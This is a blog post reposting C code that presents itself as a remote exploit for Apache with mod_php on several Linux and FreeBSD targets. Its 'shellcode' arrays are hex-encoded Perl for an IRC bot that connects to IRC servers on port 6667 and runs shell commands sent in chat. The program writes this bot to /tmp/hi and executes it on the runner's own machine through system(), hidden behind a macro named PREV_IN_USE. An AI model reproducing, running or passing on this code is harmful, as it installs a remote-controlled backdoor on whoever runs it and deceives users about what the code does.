ITPub博客

首页 > 应用开发 > IT综合 > [PRIVATE!] Apache

[PRIVATE!] Apache

原创 IT综合 作者:coolwinds 时间:2005-08-25 00:27:16 0 删除 编辑
[PRIVATE!][PRIVATE!][PRIVATE!][@more@]

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SIZE 0xffffff
#define PREV_IN_USE system
#define VALID_RANGE 0xbffffe00
#define OFFSET 106
#define FD 0x080518fc
#define BD 0x08082000


char jmpcode[] = "xebx0aiiiiiiiiii";

char shellcode[] =
"x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
"x24x63x68x61x6ex3dx22x23x63x6ex22x3bx0ax24x6bx65"
"x79x20x3dx22x66x61x67x73x22x3bx0ax24x6ex69x63x6b"
"x3dx22x70x68x70x65x22x3bx0ax24x73x65x72x76x65x72"
"x3dx22x69x72x63x2ex64x6bx73x2ex63x61x22x3bx0ax24"
"x53x49x47x7bx54x45x52x4dx7dx3dx7bx7dx3bx0ax65x78"
"x69x74x20x69x66x20x66x6fx72x6bx3bx0ax75x73x65x20"
"x49x4fx3ax3ax53x6fx63x6bx65x74x3bx0ax24x73x6fx63"
"x6bx20x3dx20x49x4fx3ax3ax53x6fx63x6bx65x74x3ax3a"
"x49x4ex45x54x2dx3ex6ex65x77x28x24x73x65x72x76x65"
"x72x2ex22x3ax36x36x36x37x22x29x7cx7cx65x78x69x74"
"x3bx0ax70x72x69x6ex74x20x24x73x6fx63x6bx20x22x55"
"x53x45x52x20x70x68x70x65x20x2bx69x20x70x68x70x65"
"x20x3ax70x68x70x65x5cx6ex4ex49x43x4bx20x70x68x70"
"x65x5cx6ex22x3bx0ax24x69x3dx31x3bx0ax77x68x69x6c"
"x65x28x3cx24x73x6fx63x6bx3ex3dx7ex2fx5ex5bx5ex20"
"x5dx2bx20x28x5bx5ex20x5dx2bx29x20x2fx29x7bx0ax20"
"x20x20x20x24x6dx6fx64x65x3dx24x31x3bx0ax20x20x20"
"x20x6cx61x73x74x20x69x66x20x24x6dx6fx64x65x3dx3d"
"x22x30x30x31x22x3bx0ax20x20x20x20x69x66x28x24x6d"
"x6fx64x65x3dx3dx22x34x33x33x22x29x7bx0ax20x20x20"
"x20x20x20x20x20x24x69x2bx2bx3bx0ax20x20x20x20x20"
"x20x20x20x24x6ex69x63x6bx3dx7ex73x2fx5cx64x2ax24"
"x2fx24x69x2fx3bx0ax20x20x20x20x20x20x20x20x70x72"
"x69x6ex74x20x24x73x6fx63x6bx20x22x4ex49x43x4bx20"
"x24x6ex69x63x6bx5cx6ex22x3bx0ax20x20x20x20x7dx0a"
"x7dx0ax70x72x69x6ex74x20x24x73x6fx63x6bx20x22x4a"
"x4fx49x4ex20x24x63x68x61x6ex20x24x6bx65x79x5cx6e"
"x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
"x3ex29x7bx0ax20x20x20x20x69x66x20x28x2fx5ex50x49"
"x4ex47x20x28x2ex2ax29x24x2fx29x7bx0ax20x20x20x20"
"x20x20x20x20x70x72x69x6ex74x20x24x73x6fx63x6bx20"
"x22x50x4fx4ex47x20x24x31x5cx6ex4ax4fx49x4ex20x24"
"x63x68x61x6ex5cx6ex22x3bx0ax20x20x20x20x7dx0ax20"
"x20x20x20x69x66x20x28x73x2fx5ex5bx5ex20x5dx2bx20"
"x50x52x49x56x4dx53x47x20x24x63x68x61x6ex20x3ax24"
"x6ex69x63x6bx5bx5ex20x3ax5cx77x5dx2ax3ax5bx5ex20"
"x3ax5cx77x5dx2ax20x28x2ex2ax29x24x2fx24x31x2fx29"
"x20x7bx0ax20x20x20x20x20x20x20x20x73x2fx5cx73x2a"
"x24x2fx2fx3bx0ax20x20x20x20x20x20x20x20x24x5fx3d"
"x60x24x5fx60x3bx0ax20x20x20x20x20x20x20x20x66x6f"
"x72x65x61x63x68x20x28x73x70x6cx69x74x20x22x5cx6e"
"x22x29x20x7bx0ax20x20x20x20x20x20x20x20x20x20x20"
"x20x70x72x69x6ex74x20x24x73x6fx63x6bx20x22x50x52"
"x49x56x4dx53x47x20x24x63x68x61x6ex20x3ax24x5fx5c"
"x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
"x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
"x20x7dx0ax20x20x20x20x7dx0ax7dx0ax23x63x68x6dx6f"
"x64x20x2bx78x20x2fx74x6dx70x2fx68x69x20x32x3ex2f"
"x64x65x76x2fx6ex75x6cx6cx3bx2fx74x6dx70x2fx68x69";


char fbsd_shellcode[] =
"x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
"x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
"x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
"x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
"x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
"x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
"x3dx7bx7dx3bx65x78x69x74x20x69x66x20x66x6fx72x6b"
"x3bx75x73x65x20x49x4fx3ax3ax53x6fx63x6bx65x74x3b"
"x24x73x6fx63x6bx20x3dx20x49x4fx3ax3ax53x6fx63x6b"
"x65x74x3ax3ax49x4ex45x54x2dx3ex6ex65x77x28x24x73"
"x65x72x76x65x72x2ex22x3ax36x36x36x37x22x29x7cx7c"
"x65x78x69x74x3bx70x72x69x6ex74x20x24x73x6fx63x6b"
"x20x22x55x53x45x52x20x6dx6fx72x6fx6ex20x2bx69x20"
"x6dx6fx72x65x20x3ax6dx6fx72x65x76x32x5cx6ex4ex49"
"x43x4bx20x70x68x70x65x78x78x5cx6ex22x3bx24x69x3d"
"x31x3bx77x68x69x6cx65x28x3cx24x73x6fx63x6bx3ex3d"
"x7ex2fx5ex5bx5ex20x5dx2bx20x28x5bx5ex20x5dx2bx29"
"x20x2fx29x7bx24x6dx6fx64x65x3dx24x31x3bx6cx61x73"
"x74x20x69x66x20x24x6dx6fx64x65x3dx3dx22x30x30x31"
"x22x3bx69x66x28x24x6dx6fx64x65x3dx3dx22x34x33x33"
"x22x29x7bx24x69x2bx2bx3bx24x6ex69x63x6bx3dx7ex73"
"x2fx5cx64x2ax24x2fx24x69x2fx3bx70x72x69x6ex74x20"
"x24x73x6fx63x6bx20x22x4ex49x43x4bx20x24x6ex69x63"
"x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
"x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
"x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
"x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
"x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
"x24x73x6fx63x6bx20x22x50x4fx4ex47x20x24x31x5cx6e"
"x4ax4fx49x4ex20x24x63x68x61x6ex5cx6ex22x3bx7dx69"
"x66x20x28x73x2fx5ex5bx5ex20x5dx2bx20x50x52x49x56"
"x4dx53x47x20x24x63x68x61x6ex20x3ax24x6ex69x63x6b"
"x5bx5ex20x3ax5cx77x5dx2ax3ax5bx5ex20x3ax5cx77x5d"
"x2ax20x28x2ex2ax29x24x2fx24x31x2fx29x20x7bx73x2f"
"x5cx73x2ax24x2fx2fx3bx24x5fx3dx60x24x5fx60x3bx66"
"x6fx72x65x61x63x68x20x28x73x70x6cx69x74x20x22x5c"
"x6ex22x29x20x7bx70x72x69x6ex74x20x24x73x6fx63x6b"
"x20x22x50x52x49x56x4dx53x47x20x24x63x68x61x6ex20"
"x3ax24x5fx5cx6ex22x3bx73x6cx65x65x70x20x31x3bx7d"
"x7dx7dx23x63x68x6dx6fx64x20x2bx78x20x2fx74x6dx70"
"x2fx68x69x20x32x3ex2fx64x65x76x2fx6ex75x6cx6cx3b"
"x2fx74x6dx70x2fx68x69x0a";

void usage(char *arg){
printf("* mod_php remote exploit vs Linux/FreeBSD *n");
printf("Usage: %s -h -d n",arg);
printf("Options:n");
printf("t-h ip/host of targetn");
printf("t-p portn");
printf("t-d php filen");
printf("t-B memory_limit 8/16/64n");
printf("t-t targetn");
printf("Targets for Apache 1.3.31 & php 4.3.7:n");
printf("tFreeBSD 5: 0n");
printf("tFreeBSD 4.x: 1n");
printf("tFedora Core 2: 2n");
printf("tRedhat 9: 3n");
printf("tSuSe 9.1: 4n");
printf("tDebian 3: 5n");
printf("tGentoo 2004: 6n");
}

int main(int argc, char **argv){
FILE *jmpinst;
char h[500],file[500]="index.php",buffer[1024], *payload, *ptr;
int port=80,limit=8,target=0,sock;
struct hostent *host;
struct sockaddr_in addr;

if(argc < 3){
usage(argv[0]);
return 1;
}

while (optind < argc){
int result = getopt(argc, argv, "p::d:B::t:::h:d:");
if (result == -1) break;
switch (result){
case 'h':
strncpy(h,optarg,sizeof(h));
break;
case 'd':
strncpy(file,optarg,sizeof(file));
break;
case 'p':
if (optarg)
port = atoi(optarg);
else
port = 80;
break;
case 'B':
if (optarg)
limit = atoi(optarg);
else
limit = 8;
if(limit != 8 && limit != 16 && limit != 64)
limit = 8;
break;
case 't':
if (target)
target = atoi(optarg);
else
target = 0;
if(target != 0 && target != 1 && target != 2 &&
target != 3 && target != 4 && target != 5 &&
target != 6)
target = 0;
break;
default:
usage(argv[0]);
return 1;
}
}
if (!inet_aton(h, &addr.sin_addr)){
host = gethostbyname(h);
if (!host){
printf("Resolving failedn");
return 1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}
sock = socket(PF_INET, SOCK_STREAM, 0);
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
printf("Connecting failedn");
return 1;
}
printf("STEP1 - Guessing remote memory_limitn");
switch(limit){
case 8:
printf("+ Testing 8MO ... Ok !n");
break;
case 16:
printf("+ Testing 16MO ... Ok !n");
break;
case 64:
printf("+ Testing 64MO ... Ok !n");
break;
default:
printf("+ Testing 64MO ... Ok !n");
}
payload = malloc(limit * 10000);
ptr = payload+8;
memcpy(ptr,jmpcode,strlen(jmpcode));
jmpinst=fopen(shellcode+793,"w+");
if(jmpinst){
fseek(jmpinst,0,SEEK_SET);
fprintf(jmpinst,"%s",shellcode);
fclose(jmpinst);
}
ptr += strlen(jmpcode);
if(target != 5 && target != 6){
memcpy(ptr,shellcode,strlen(shellcode));
ptr += strlen(shellcode);
memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));
}
else{
memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
ptr += strlen(fbsd_shellcode);
memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));
}
printf("STEP2 - Guessing heap junk sizen");
printf("+ 1000 ... ");
snprintf(buffer,sizeof(buffer),
"POST /%s HTTP/1.1rn"
"Host: %srn"
"Referer: www.google.comrn"
"Content-type: application/x-www-form-urlencodedrn"
"Content-length: %drn"
"Connection: closernrn"
"foobar=",file,h,10000-1);
send(sock,buffer,strlen(buffer),0);
send(sock,ptr,10000,0);
close(sock);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1)
printf("CRASHn");
else
printf("ALIVEn");
printf("+ 500 ... ");
snprintf(buffer,sizeof(buffer),
"POST /%s HTTP/1.1rn"
"Host: %srn"
"Referer: www.google.comrn"
"Content-type: application/x-www-form-urlencodedrn"
"Content-length: %drn"
"Connection: closernrn"
"foobar=",file,h,5000-1);
send(sock,buffer,strlen(buffer),0);
send(sock,ptr,5000,0);
close(sock);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1)
printf("CRASHn");
else
printf("ALIVEn");
printf("+ 250 ... ");
snprintf(buffer,sizeof(buffer),
"POST /%s HTTP/1.1rn"
"Host: %srn"
"Referer: www.google.comrn"
"Content-type: application/x-www-form-urlencodedrn"
"Content-length: %drn"
"Connection: closernrn"
"foobar=",file,h,2500-1);
send(sock,buffer,strlen(buffer),0);
send(sock,ptr,2500,0);
close(sock);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1)
printf("CRASHn");
else
printf("ALIVEn");
printf("+ 375 ... ");
snprintf(buffer,sizeof(buffer),
"POST /%s HTTP/1.1rn"
"Host: %srn"
"Referer: www.google.comrn"
"Content-type: application/x-www-form-urlencodedrn"
"Content-length: %drn"
"Connection: closernrn"
"foobar=",file,h,3750-1);
send(sock,buffer,strlen(buffer),0);
send(sock,ptr,3750,0);
close(sock);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1)
printf("CRASHn");
else
printf("ALIVEn");
printf("STEP3 - Taking control over pDestructor BADn");
switch(target){
case 0:
printf("+ Targeting FreeBSD 5 Ok !n");
ptr = payload;
*((void **)ptr) = (void *)(0x080537ce - 12);
ptr += 4;
*((void **)ptr) = (void *)(0x08082000 + 8);
break;
case 1:
printf("+ Targeting FreeBSD 4 Ok !n");
ptr = payload;
*((void **)ptr) = (void *)(0x080637ce - 12);
ptr += 4;
*((void **)ptr) = (void *)(0x08081000 + 8);
break;
case 2:
printf("+ Targeting Fedora Ok !n");
ptr = payload;
*((void **)ptr) = (void *)(0x0807e5f4 - 12);
ptr += 4;
*((void **)ptr) = (void *)(0x08081000 + 8);
break;
case 3:
printf("+ Targeting Redhat Ok !n");
ptr = payload;
*((void **)ptr) = (void *)(0x0805c1fc - 12);
ptr += 4;
*((void **)ptr) = (void *)(0x08062000 + 8);
break;
case 4:
printf("+ Targeting SuSe Ok !n");
ptr = payload;
*((void **)ptr) = (void *)(0x080518fc - 12);
ptr += 4;
*((void **)ptr) = (void *)(0x08073000 + 8);
break;
case 5:
printf("+ Targeting Debian Ok !n");
ptr = payload;
*((void **)ptr) = (void *)(0x080713ce - 12);
ptr += 4;
*((void **)ptr) = (void *)(0x08025000 + 8);
break;
case 6:
printf("+ Targeting Gentoo Ok !n");
ptr = payload;
*((void **)ptr) = (void *)(0x080937ce - 12);
ptr += 4;
*((void **)ptr) = (void *)(0x08072000 + 8);
break;
}
payload[sizeof(payload)-1] = '';
payload[sizeof(payload)-2] = '';
strncat(payload,"0x1",PREV_IN_USE(shellcode+764));
snprintf(buffer,sizeof(buffer),
"POST /%s HTTP/1.1rn"
"Host: %srn"
"Referer: www.google.comrn"
"Content-type: application/x-www-form-urlencodedrn"
"Content-length: %drn"
"Connection: closernrn"
"foobar=",file,h,strlen(payload)+8);
send(sock,buffer,strlen(buffer),0);
send(sock,payload,strlen(payload),0);
close(sock);
free(payload);
addr.sin_port = htons(6666);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == 0)
printf("-- YOU ARE IN FUCKER --n");
else
printf("-- FAILED - WRONG TARGET FUCKER --n");
close(sock);
return 0;
}

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-805091/,如需转载,请注明出处,否则将追究法律责任。

请登录后发表评论 登录
全部评论

注册时间:2012-10-23

  • 博文量
    253
  • 访问量
    951288